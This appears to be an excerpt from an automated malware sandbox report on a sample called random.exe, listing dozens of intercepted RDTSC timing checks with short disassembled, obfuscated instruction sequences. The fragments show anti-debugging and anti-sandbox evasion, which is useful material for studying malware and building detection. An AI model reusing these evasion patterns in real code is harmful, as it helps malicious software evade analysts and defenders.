            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A50BDD second address: 4A50C4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F6B8CF111A0h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F6B8CF1119Dh 0x0000001c sub esi, 2F25B586h 0x00000022 jmp 00007F6B8CF111A1h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F6B8CF111A0h 0x0000002e sbb al, 00000028h 0x00000031 jmp 00007F6B8CF1119Bh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A2086E second address: 4A2089E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov ebx, 1D8F2DBCh 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6B8D266C41h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A2089E second address: 4A208E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B8CF111A7h 0x00000008 mov edx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f jmp 00007F6B8CF111A0h 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6B8CF111A3h 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A208E9 second address: 4A20916 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6B8D266C3Dh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60E2E second address: 4A60E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8CF111A4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60E46 second address: 4A60E92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ebx, 241BD1AAh 0x00000012 call 00007F6B8D266C3Bh 0x00000017 mov esi, 673D636Fh 0x0000001c pop esi 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ax, 9D03h 0x00000026 call 00007F6B8D266C48h 0x0000002b pop esi 0x0000002c popad 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60E92 second address: 4A60EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B8CF1119Eh 0x00000009 jmp 00007F6B8CF111A5h 0x0000000e popfd 0x0000000f mov di, si 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B8CF111A9h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60EDD second address: 4A60EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60EF9 second address: 4A60EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E0933 second address: 49E0937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E0937 second address: 49E093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E093D second address: 49E0960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6B8D266C3Eh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E0960 second address: 49E0972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8CF1119Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E0972 second address: 49E098B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F6B8D266C3Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E09F0 second address: 49E0A0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E0A0D second address: 49E0A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49E0A13 second address: 49E0A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A20595 second address: 4A205F7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6B8D266C42h 0x00000008 add eax, 30F68C88h 0x0000000e jmp 00007F6B8D266C3Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F6B8D266C49h 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov bx, cx 0x00000022 mov dx, si 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6B8D266C41h 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60600 second address: 4A60618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8CF111A4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60618 second address: 4A60627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60627 second address: 4A6062D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A6062D second address: 4A60633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60633 second address: 4A60637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60637 second address: 4A60660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6B8D266C48h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60660 second address: 4A60666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A604F7 second address: 4A60561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dh, ah 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007F6B8D266C43h 0x00000013 pushfd 0x00000014 jmp 00007F6B8D266C48h 0x00000019 sbb ah, 00000018h 0x0000001c jmp 00007F6B8D266C3Bh 0x00000021 popfd 0x00000022 pop eax 0x00000023 mov dx, 3E5Ch 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60561 second address: 4A60567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60398 second address: 4A6039E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A6039E second address: 4A603A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A603A2 second address: 4A603A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A603A6 second address: 4A603CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push ecx 0x0000000c call 00007F6B8CF111A5h 0x00000011 pop ecx 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 mov edi, esi 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A2066C second address: 4A20682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8D266C42h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A20682 second address: 4A206BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 mov si, 9037h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B8CF111A9h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A6098B second address: 4A609A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8D266C44h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A609A3 second address: 4A609B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, 4CACh 0x00000010 movsx edx, si 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A609B7 second address: 4A60A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B8D266C3Dh 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6B8D266C3Fh 0x0000001a and cx, C50Eh 0x0000001f jmp 00007F6B8D266C49h 0x00000024 popfd 0x00000025 mov ah, 02h 0x00000027 popad 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60A05 second address: 4A60A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B8CF111A8h 0x00000009 adc ecx, 01EB16B8h 0x0000000f jmp 00007F6B8CF1119Bh 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007F6B8CF111A2h 0x00000022 mov eax, dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60A56 second address: 4A60A5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60A5C second address: 4A60AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, 2AC7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and dword ptr [eax], 00000000h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6B8CF111A8h 0x00000016 sub cx, 72A8h 0x0000001b jmp 00007F6B8CF1119Bh 0x00000020 popfd 0x00000021 mov esi, 5F58F59Fh 0x00000026 popad 0x00000027 and dword ptr [eax+04h], 00000000h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F6B8CF111A1h 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10867 second address: 4A10885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10885 second address: 4A10889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10889 second address: 4A1088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A1088D second address: 4A10893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60811 second address: 4A60815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60815 second address: 4A6082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A6082F second address: 4A60835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60835 second address: 4A60839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60839 second address: 4A6084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dh, ch 0x0000000e mov esi, edx 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A6084A second address: 4A60850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60850 second address: 4A60854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A60854 second address: 4A60876 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, edx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A408F6 second address: 4A40906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8D266C3Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40906 second address: 4A4090A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A4090A second address: 4A40928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B8D266C43h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40928 second address: 4A40940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8CF111A4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40940 second address: 4A40953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx eax, bx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A40953 second address: 4A40958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A304D5 second address: 4A30536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6B8D266C46h 0x0000000c sub si, 0158h 0x00000011 jmp 00007F6B8D266C3Bh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b jmp 00007F6B8D266C47h 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6B8D266C42h 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A30536 second address: 4A30551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ch, BFh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ecx, edi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F0008 second address: 49F0025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F0025 second address: 49F0096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6B8CF111A3h 0x00000013 and esi, 180A29FEh 0x00000019 jmp 00007F6B8CF111A9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F6B8CF111A0h 0x00000025 adc eax, 1D31F0F8h 0x0000002b jmp 00007F6B8CF1119Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F0096 second address: 49F00DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6B8D266C3Fh 0x00000008 pop esi 0x00000009 mov si, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov eax, 625A4AEDh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jmp 00007F6B8D266C48h 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F00DA second address: 49F00F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F00F7 second address: 49F0166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007F6B8D266C48h 0x0000000c adc cl, 00000078h 0x0000000f jmp 00007F6B8D266C3Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov cl, B5h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F6B8D266C47h 0x00000025 add si, 6EEEh 0x0000002a jmp 00007F6B8D266C49h 0x0000002f popfd 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F0166 second address: 49F0200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and esp, FFFFFFF8h 0x0000000a pushad 0x0000000b mov di, si 0x0000000e mov cl, D3h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ax, 3B03h 0x00000017 mov ch, 84h 0x00000019 popad 0x0000001a mov dword ptr [esp], ecx 0x0000001d jmp 00007F6B8CF1119Bh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov cx, C56Bh 0x00000028 mov ch, 4Dh 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F6B8CF1119Ah 0x00000031 xchg eax, ebx 0x00000032 jmp 00007F6B8CF111A0h 0x00000037 mov ebx, dword ptr [ebp+10h] 0x0000003a pushad 0x0000003b call 00007F6B8CF1119Eh 0x00000040 mov ax, ABB1h 0x00000044 pop esi 0x00000045 mov esi, edi 0x00000047 popad 0x00000048 push ecx 0x00000049 jmp 00007F6B8CF111A6h 0x0000004e mov dword ptr [esp], esi 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F6B8CF111A7h 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F033F second address: 49F0345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F0345 second address: 49F0387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edx, 61000000h 0x0000000e jmp 00007F6B8CF111A7h 0x00000013 jne 00007F6BFF6BF4B4h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6B8CF111A5h 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F0387 second address: 49F0397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B8D266C3Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F0397 second address: 49F039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 49F039B second address: 49F03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c jmp 00007F6B8D266C47h 0x00000011 jne 00007F6BFFA14F19h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B8D266C45h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10AB5 second address: 4A10B29 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6B8CF1119Eh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esp 0x0000000c jmp 00007F6B8CF1119Eh 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007F6B8CF111A0h 0x00000019 mov ebp, esp 0x0000001b jmp 00007F6B8CF111A0h 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F6B8CF1119Dh 0x0000002c sbb al, FFFFFFA6h 0x0000002f jmp 00007F6B8CF111A1h 0x00000034 popfd 0x00000035 push eax 0x00000036 pop ebx 0x00000037 popad 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10B29 second address: 4A10B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10B2F second address: 4A10B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4A10B33 second address: 4A10BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a call 00007F6B8D266C3Eh 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 call 00007F6B8D266C41h 0x00000017 pushfd 0x00000018 jmp 00007F6B8D266C40h 0x0000001d and eax, 6128CED8h 0x00000023 jmp 00007F6B8D266C3Bh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [esp], ebx 0x0000002e jmp 00007F6B8D266C3Fh 0x00000033 xchg eax, esi 0x00000034 jmp 00007F6B8D266C46h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6B8D266C3Eh 0x00000041 rdtsc
